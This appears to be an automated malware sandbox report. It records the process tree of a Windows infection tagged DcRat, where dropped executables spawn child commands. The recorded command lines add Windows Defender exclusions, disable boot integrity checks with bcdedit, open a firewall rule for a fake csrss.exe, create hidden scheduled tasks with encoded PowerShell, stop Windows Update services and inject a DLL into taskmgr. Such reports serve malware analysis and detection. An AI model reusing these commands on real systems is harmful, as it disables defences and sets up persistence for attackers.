- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1656 -
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:2272 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:3028
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:1484
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMon driver.
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2688 -
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:1196
-
-
C:\Windows\system32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:1924
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"6⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2960 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER7⤵
- Modifies boot configuration data using bcdedit
PID:2628
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:7⤵
- Modifies boot configuration data using bcdedit
PID:2816
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:7⤵
- Modifies boot configuration data using bcdedit
PID:2256
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows7⤵
- Modifies boot configuration data using bcdedit
PID:2636
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe7⤵
- Modifies boot configuration data using bcdedit
PID:3040
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe7⤵
- Modifies boot configuration data using bcdedit
PID:368
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 07⤵
- Modifies boot configuration data using bcdedit
PID:848
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn7⤵
- Modifies boot configuration data using bcdedit
PID:1804
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 17⤵
- Modifies boot configuration data using bcdedit
PID:2140
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}7⤵
- Modifies boot configuration data using bcdedit
PID:2480
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast7⤵
- Modifies boot configuration data using bcdedit
PID:912
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 07⤵
- Modifies boot configuration data using bcdedit
PID:2472
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}7⤵
- Modifies boot configuration data using bcdedit
PID:1520
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
PID:2008
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v6⤵
- Modifies boot configuration data using bcdedit
PID:3032
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe6⤵
- Executes dropped EXE
PID:700
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:788
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
PID:2184 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:1468
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:2236
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exeC:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe6⤵
- Executes dropped EXE
PID:2696 -
C:\Windows\system32\schtasks.exeschtasks /delete /tn "csrss" /f7⤵PID:1968
-
-
C:\Windows\system32\schtasks.exeschtasks /delete /tn "ScheduledUpdate" /f7⤵PID:332
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3036 -
C:\Users\Admin\AppData\Local\Temp\7zS37F2.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1288 -
C:\Users\Admin\AppData\Local\Temp\7zS3A14.tmp\Install.exe.\Install.exe /MKdidA "385119" /S5⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
PID:2436 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵PID:2248
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵PID:1748
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵PID:2752
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵PID:2268
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵PID:2756
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵PID:2796
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵PID:628
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵PID:2140
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gvVZWiGbX" /SC once /ST 02:05:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- DcRat
- Creates scheduled task(s)
PID:1860
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gvVZWiGbX"6⤵PID:2536
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gvVZWiGbX"6⤵PID:2520
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 04:56:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\rVzNwXv.exe\" 3Y /ySsite_idvCF 385119 /S" /V1 /F6⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
PID:840
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\kos2.exe"C:\Users\Admin\AppData\Local\Temp\kos2.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1484 -
C:\Users\Admin\AppData\Local\Temp\set16.exe"C:\Users\Admin\AppData\Local\Temp\set16.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2988 -
C:\Users\Admin\AppData\Local\Temp\is-1R05I.tmp\is-TP019.tmp"C:\Users\Admin\AppData\Local\Temp\is-1R05I.tmp\is-TP019.tmp" /SL4 $10274 "C:\Users\Admin\AppData\Local\Temp\set16.exe" 1281875 522245⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:2600 -
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" helpmsg 206⤵PID:2000
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 helpmsg 207⤵PID:1936
-
-
-
C:\Program Files (x86)\MyBurn\MyBurn.exe"C:\Program Files (x86)\MyBurn\MyBurn.exe" -i6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1720
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Query6⤵PID:2528
-
-
C:\Program Files (x86)\MyBurn\MyBurn.exe"C:\Program Files (x86)\MyBurn\MyBurn.exe" -s6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2096
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\K.exe"C:\Users\Admin\AppData\Local\Temp\K.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2496
-
-
-
C:\Users\Admin\AppData\Local\Temp\latestX.exe"C:\Users\Admin\AppData\Local\Temp\latestX.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
PID:2940
-
-
-
C:\Users\Admin\AppData\Local\Temp\155C.exeC:\Users\Admin\AppData\Local\Temp\155C.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2780
-
-
C:\Users\Admin\AppData\Local\Temp\17EC.exeC:\Users\Admin\AppData\Local\Temp\17EC.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:1992 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1992 -s 5203⤵
- Loads dropped DLL
- Program crash
PID:2148
-
-
-
C:\Users\Admin\AppData\Local\Temp\54CE.exeC:\Users\Admin\AppData\Local\Temp\54CE.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1636 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
-
C:\Users\Admin\AppData\Local\Temp\6CE1.exeC:\Users\Admin\AppData\Local\Temp\6CE1.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1032 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:768
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 2564⤵
- Program crash
PID:984
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:2508
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2248
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2140
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3004
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:608
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1468
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1824 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- DcRat
- Creates scheduled task(s)
PID:912
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:1248
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:2404
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:548
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:2024
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2180
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:2464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:564
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:2084
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2232
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:548
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1920
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3032
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2180
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1088 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- DcRat
- Creates scheduled task(s)
PID:2228
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:268
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2552
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2288
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1508
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2956
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:2488
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2868
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {B512842F-1D6F-4291-A943-617091D66294} S-1-5-21-3618187007-3650799920-3290345941-1000:BPDFUYWR\Admin:Interactive:[1]1⤵PID:1388
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe2⤵
- Executes dropped EXE
PID:2712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2040 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2124
-
-
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe2⤵
- Executes dropped EXE
PID:688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2528 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2568
-
-
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe2⤵
- Executes dropped EXE
PID:2968
-
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe2⤵
- Executes dropped EXE
PID:2076
-
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231025045518.log C:\Windows\Logs\CBS\CbsPersist_20231025045518.cab1⤵
- Drops file in Windows directory
PID:1580
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "13008904181964767807662118810-428265889517071880-2020988188412013543288926030"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2024
-
C:\Windows\system32\taskeng.exetaskeng.exe {66C153DA-770C-4BB7-9622-CFD0A633B0CA} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
PID:1496 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:1940
-
-
C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\rVzNwXv.exeC:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\rVzNwXv.exe 3Y /ySsite_idvCF 385119 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1760 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gCWbUYlmG" /SC once /ST 03:36:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- DcRat
- Creates scheduled task(s)
PID:2748
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gCWbUYlmG"3⤵PID:1296
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gCWbUYlmG"3⤵PID:1608
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:323⤵PID:2156
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:643⤵PID:1000
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2380
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:323⤵PID:2948
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:324⤵PID:2160
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:643⤵PID:2044
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:644⤵PID:2592
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\wUBDPVxDQVpvNZiy\EVRgLGGm\UrPUMbOuZHCAMWty.wsf"3⤵PID:548
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\wUBDPVxDQVpvNZiy\EVRgLGGm\UrPUMbOuZHCAMWty.wsf"3⤵PID:1252
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:324⤵PID:1940
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:644⤵PID:1556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2288
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:324⤵PID:2984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:644⤵PID:2076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1248
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:644⤵PID:1636
-
-
